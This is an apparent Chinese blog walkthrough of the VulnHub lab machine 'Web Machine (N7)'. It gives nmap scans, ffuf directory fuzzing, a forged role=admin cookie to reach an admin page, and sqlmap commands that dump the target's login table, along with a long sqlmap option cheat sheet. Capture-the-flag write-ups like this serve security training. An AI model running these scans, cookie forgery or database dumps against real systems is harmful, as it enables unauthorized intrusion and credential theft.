vulnhub靶场2:Web machine(N7)

最新推荐文章于 2024-10-04 10:34:55 发布
最新推荐文章于 2024-10-04 10:34:55 发布
阅读量416 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Genarior/article/details/129508557
版权

  1. 第一步局域网扫描

nmap -sn 192.168.52.0/24

  1. 锁定目标机器。接着继续使用namp扫描服务信息

nmap -sV -sC -A 192.168.52.200

nmap -sC <scirptfile> 192.168.xx //使用脚本进行扫描,耗时长

 nmap -sV 192.168.xx //对端口上的服务程序版本进行扫描

nmap -A //强力扫描,耗时长

  1. 发现80端口,访问试试,发现网站

  1. 使用ffuf进行目录扫描

ffuf -u http://192.168.52.200/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .zip,.php,.html,.txt -mc 200 -s

ffuf 基础指令

• -u url地址

• -w 设置字典

• -c 将响应状态码用颜色区分,windows下无法实现该效果。

• -t 线程率,默认40

• -p 请求延时: 0.1、0.2s

• -ac 自动校准fuzz结果

• -H Header头,格式为 “Name: Value”

• -X HTTP method to use

• -d POST data

• -r 跟随重定向

• -recursion num 递归扫描

• -x 设置代理 http 或 socks5://127.0.0.1:8080

• -s 不打印附加信息,简洁输出

• -e 设置脚本语言 -e .asp,.php,.html,.txt等

• -o 输出文本

• -of 输出格式文件,支持html、json、md、csv、或者all

• -ic 忽略字典注释

• -s 静默模式,只打印结果

• -mc 200 过滤结果

扫描到了几个文件。

  1. 访问exploit.html,发现可以文件上传

  1. 上传文件发现被定向到了localhost

  1. 通过修改html值重新发送

  1. 提交拿到一串flag

  1. 继续排查,看网上教程,还扫描到了/enter_network/这个目录和/enter_network/admin.php文件

9.1.1这里有两种方式,简单的第一种,直接访问/enter_network/

role是base64+md5,解密得到admin

9.1.2访问/enter_network/admin.php,带上将  role改成admin,得到另外一般flag。

9.2.1这个地方也可以使用sqlmap破解数据库

/enter_network/看到输入表单,用sqlmap查一下post是否存在注入

sqlmap -u http://192.168.52.200/enter_network/ --form --random-agent -level=1  -dbs -batch

sqlmap小结:

SQLMap可以完成注入点的发现,数据库类型的确认,WebShell权限和路径的确认,拖库等一系列功能。测试的Payload共分为5级:Level 1 ~ Level 5,Level 1属于基础级,Payload相对较少,Level 5 Payload很多。

--forms sqlmap会自动从-u中的url获取页面中的表单进行测试。

-u 指定目标URL (可以是http协议也可以是https协议)

-d 连接数据库

--dbs 列出所有的数据库

--current-db 列出当前数据库

--tables 列出当前的表

--columns 列出当前的列

-D 选择使用哪个数据库

-T 选择使用哪个表

-C 选择使用哪个列

--dump 获取字段中的数据

--batch 自动选择yes

--smart 启发式快速判断,节约浪费时间

--forms 尝试使用post注入

-r 加载文件中的HTTP请求(本地保存的请求包txt文件)

-l 加载文件中的HTTP请求(本地保存的请求包日志文件)

-g 自动获取Google搜索的前一百个结果,对有GET参数的URL测试

-o 开启所有默认性能优化

--tamper 调用脚本进行注入

-v 指定sqlmap的回显等级

--delay 设置多久访问一次

--os-shell 获取主机shell,一般不太好用,因为没权限

-m 批量操作

-c 指定配置文件,会按照该配置文件执行动作

-data data指定的数据会当做post数据提交

-timeout 设定超时时间

-level 设置注入探测等级 当–level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5

--risk 风险等级 1-3 risk越高,越慢但是越安全

--identify-waf 检测防火墙类型

--param-del="分割符" 设置参数的分割符

--skip-urlencode 不进行url编码

--keep-alive 设置持久连接,加快探测速度

--null-connection 检索没有body响应的内容,多用于盲注

--thread 最大为10 设置多线程

--delay

--random-agent

--dbms 指定数据库

有些web服务器请求访问太过频繁可能会被防火墙拦截,使用--delay就可以设定两次http请求的延时

发现数据库Machine,继续爆破数据库表

qlmap -u http://192.168.52.200/enter_network/ --form --random-agent -level=1  -dbms MySql -D Machine -tables --batch

发现标login,继续爆破表列

sqlmap -u http://192.168.52.200/enter_network/ --form --random-agent -level=1  -dbms MySql -D Machine -T login -columns --batch

扫出了列,继续爆破内容:

sqlmap -u http://192.168.52.200/enter_network/ --form --random-agent -level=1  -dbms MySql -D Machine -T login -C username,password --dump --batch

顺利拿到flag。

主要工具

sqlmap的使用

ffuf的使用

nmap的使用

Web-Machine-N7
Forever_Han13的博客
03-20 1965
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CST Nmap scan report for 192.168.0.1 Host is up (0.00048s latency). MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies) Nmap scan report
VulnHub | Web_Machine-N7
snowlyzz的博客
09-27 837
内网渗透,这题不值得一做
VulnhubWeb-Machine-N7
lm19770429的专栏
02-12 4070
靶机下载地址: Web Machine: (N7) ~ VulnHubWeb Machine: (N7), made by Duty Mastr. Download & walkthrough links are available.https://www.vulnhub.com/entry/web-machine-n7,756/Difficulty: Medium 常规做法: arp-scan -I eth0 -l :本地局域网IP地址扫描,个人感觉比nmap -sn 快 nmap -A
Web-Machine-N7解题过程
最新发布
qq_74263993的博客
10-04 764
sC: 启用默认的脚本扫描,这些脚本在 nmap 中称为“脚本的默认类别”(default scripts category)。6.访问网页http://192.168.1.188/enter_network/,顺便输入账号密码,查看cookie可以发现role。7.访问http://192.168.1.188/enter_network/admin.php,发现要求为admin。5.看别人的wp,发现还有一个enter_network没扫出来,添加目录再扫一遍,发现admin.php。
Vulnhub项目:Web Machine(N7)
Ays.Ie的博客
03-21 623
该篇记录了vulhub系列:Web Machine(N7)靶机的渗透过程
Vulnhub靶场Web Machine: (N7)
Nailaoyyds的博客
06-17 2541
确认靶机IP指定网卡扫描局域网 arp-scan -I eth1 -l 访问靶机,寻找功能点 localhost更改为靶机地址flag前半段直接出来了上传路径找不到了,没办法利用一句话木马。发现可疑的字符 base64>MD5 enter_network/admin.php #这个路径我的字典里没有,看其他师傅的博客才知道,没找到这个字典。role=admin......
[Vulnhub]靶场 Web MachineN7
qq_34942239的博客
02-29 635
两次url解码->base64解密->md5碰撞得到的admin,并且无论上传什么user和pass,role都是admin。索性直接再admin.php界面添加cookie role=admin,结果拿到flag。在登录界面随便输入一组账号密码的时候,相应包的cookie里面有个role。偷看了一手WP,有个目录enter_network,该目录下有。cookie中添加role=admin拿到另一半flag。至于为什么添加role=admin。提示只有admin才能进入。给出了一半的flag。
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1435
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
vulnhub靶场PHINEAS: 1实战记录
aoke79的博客
08-09 1460
vulnhub靶场PHINEAS: 1实战记录
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
刷机教程n7
12-25
刷机教程
VulnHub靶场系列:Flick
快吃小蛋糕吧的博客
10-03 1316
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来。 环境部署: 下载靶场并导入到VMware中: https://download.vulnhub.com/flick/flick.tar.gz 实战: 首先使用工具扫描整个网段得到靶机IP: fping -g 192.168.142.0/24 得到靶机IP后使用Nmap工具检测服务器开放端口: nmap -sV -p1-65535 192.168.142.35
Vulnhub——WEB MACHINE:(N7)
weixin_46038704的博客
05-30 1134
这里写自asd 定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使
web Machine(n7) 靶场实录
gaopan2667002的博客
09-01 268
反馈了一个flag 靶机的最终目的应该就是找到flag 本以为flag已经找到 到此结束,后来翻看了相关的攻略内容 发现这个flag只是其中的一半。后来查看时间盲注的内容,尝试了一下,send的时候sleep(5)执行了,并且等待了5秒页面才进行刷新。多了一个254的IP,查看了一下本机状态,除了kali以外就只有这个虚拟机是打开的。使用简单的tomcat字典爆破尝试,本机运行内存很小,速度很慢,所以没有选择大的字典。后来查看了虚拟机管理器的IP配置才想起来网段配的是56,并非之前一直使用的233。
web-machine(n7)--靶机练习
woshicainiao666的博客
12-19 491
arp-scan -l #扫描当前网段主机-A启用操作系统检测、脚本扫描和服务版本检测。这是一个综合性的选项,通常用于获取有关目标系统的详细信息-sC启用默认的脚本扫描,这些脚本在nmap中称为“脚本的默认类别”(default scripts category)。这些脚本执行各种任务,例如服务识别、漏洞检测等-sT使用 TCP 连接进行扫描。这表示nmap将使用经典的 TCP 连接来进行扫描,而不是其他可能的扫描技术-sV启用服务版本检测。这将尝试确定目标系统上运行的具体服务及其版本号。
打靶分享:WEB MACHINE: (N7)
weixin_66249173的博客
01-31 387
得到一个Flag,但是发现这个Flag不完整。到这里线索就断了,看了其他师傅的文章发现到这里其实还有两条路可走。但是前提是必须能扫出enter_network这个目录,没扫出来说明字典还不够强大,所以有一个强大的字典是成功的前提。提交后会报错,并且发现域名变成了localhost。(这里要注意字典的使用,可以使用多个字典我这里使用的是kali自带的字典)环境就不说了,和之前的文章一样。发现一个文件提交界面,随便提交一个文件看看。发现目标,查看目标主机的服务和版本信息。发现有80端口,那就先访问一下。
vulnhub——webmachine靶机
Re1_zf的博客
10-30 840
整体考察的几乎都是web知识,并没有涉及到反弹shell和提权之类的知识,关键就是看字典的利用和字典的强大性,字典没有的话,根本扫不出来感觉之所以归为中等难度并非考察的知识点有多难,而是思维扩散性,如果像前面利用cookie的方式得到前后flag后就直接提交的话,这个分就没了,它并不完整渗透涉及的知识都是常用的知识,容易忽略一些东西,尤其是像做题这种还是得保持严谨的思维。
XSS靶场实践:WEB渗透学习与技能巩固
资源摘要信息:"WEB渗透学习-XSS-labs靶场" 一、XSS基础概念 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络攻击技术,攻击者通过在目标网站的页面中注入恶意脚本代码,当其他用户浏览该页面时,嵌入的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值